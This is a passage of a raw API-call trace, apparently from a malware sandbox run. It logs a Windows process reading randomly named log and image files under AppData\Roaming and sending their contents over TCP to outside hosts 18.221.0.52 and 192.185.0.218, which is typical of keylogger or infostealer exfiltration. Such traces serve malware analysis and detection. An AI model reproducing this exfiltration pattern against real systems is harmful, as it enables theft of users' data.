ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0285.560] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0285.560] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b970) returned 1 [0285.560] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0285.560] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x6fe, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0285.560] NtClose (Handle=0x1b78) returned 0x0 [0285.560] socket (af=2, type=1, protocol=6) returned 0x1b78 [0285.561] connect (s=0x1b78, name=0x8884380*(sa_family=2, sin_port=0x50, sin_addr="18.221.0.52"), namelen=16) returned 0 [0285.677] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x10b3fae8 | out: String="3229") returned 0x0 [0285.677] send (s=0x1b78, buf=0xa0f8c8a*, len=3641, flags=0) returned 3641 [0285.678] closesocket (s=0x1b78) returned 0 [0285.679] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.679] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0285.679] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0285.679] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0285.679] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.679] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0285.680] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0285.680] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0285.680] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0285.680] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0285.680] NtClose (Handle=0x1b78) returned 0x0 [0285.680] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.680] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0285.680] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0285.681] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b970) returned 1 [0285.681] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.681] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0285.681] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0285.681] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0285.681] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.681] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0x1b78, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0285.681] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0285.681] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0285.681] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70) returned 0x0 [0285.681] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa60, Buffer=0x103e984d, BufferLength=0x16987, ByteOffset=0x10b3fa58*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa60, Buffer=0x103e984d*) returned 0x0 [0285.682] NtClose (Handle=0x1b78) returned 0x0 [0285.682] socket (af=2, type=1, protocol=6) returned 0x1b78 [0285.682] connect (s=0x1b78, name=0x8884380*(sa_family=2, sin_port=0x50, sin_addr="18.221.0.52"), namelen=16) returned 0 [0285.816] RtlIntegerToChar (in: Value=0x282fd, Base=0x0, Length=0x8, String=0x10b3fab8 | out: String="164605") returned 0x0 [0285.817] send (s=0x1b78, buf=0x10469840*, len=165019, flags=0) returned 165019 [0285.820] closesocket (s=0x1b78) returned 0 [0285.820] socket (af=2, type=1, protocol=6) returned 0x1b78 [0285.821] connect (s=0x1b78, name=0x88841c0*(sa_family=2, sin_port=0x50, sin_addr="192.185.0.218"), namelen=16) returned 0 [0285.965] send (s=0x1b78, buf=0xa10808a*, len=169, flags=0) returned 169 [0285.965] setsockopt (s=0x1b78, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0285.965] recv (in: s=0x1b78, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 749 [0286.125] closesocket (s=0x1b78) returned 0 [0286.126] Sleep (dwMilliseconds=0x7d0) [0286.128] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.128] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0286.128] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0286.128] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0286.128] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.128] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0286.129] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0286.129] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0286.129] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0286.129] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0286.129] NtClose (Handle=0x1b78) returned 0x0 [0286.129] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.129] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0286.129] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0286.129] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0286.129] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.130] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0286.130] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0286.130] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0286.130] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.130] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0286.130] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0286.130] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892ada0) returned 1 [0286.130] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.130] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0286.130] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0286.130] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892bbb0) returned 1 [0286.130] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0286.130] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x6fe, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0286.131] NtClose (Handle=0x1b78) returned 0x0 [0286.131] socket (af=2, type=1, protocol=6) returned 0x1b78 [0286.131] connect (s=0x1b78, name=0x88841c0*(sa_family=2, sin_port=0x50, sin_addr="192.185.0.218"), namelen=16) returned 0 [0286.269] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x10b3fae8 | out: String="3229") returned 0x0 [0286.269] send (s=0x1b78, buf=0xa0f8c8a*, len=3656, flags=0) returned 3656 [0286.269] closesocket (s=0x1b78) returned 0 [0286.270] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.270] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0286.270] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0286.270] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0286.270] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.270] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0286.270] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0286.270] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0286.271] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0286.271] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0286.271] NtClose (Handle=0x1b78) returned 0x0 [0286.271] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.271] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0286.271] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0286.271] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b610) returned 1 [0286.271] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.271] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0286.271] RtlGetProcessHeaps (in: 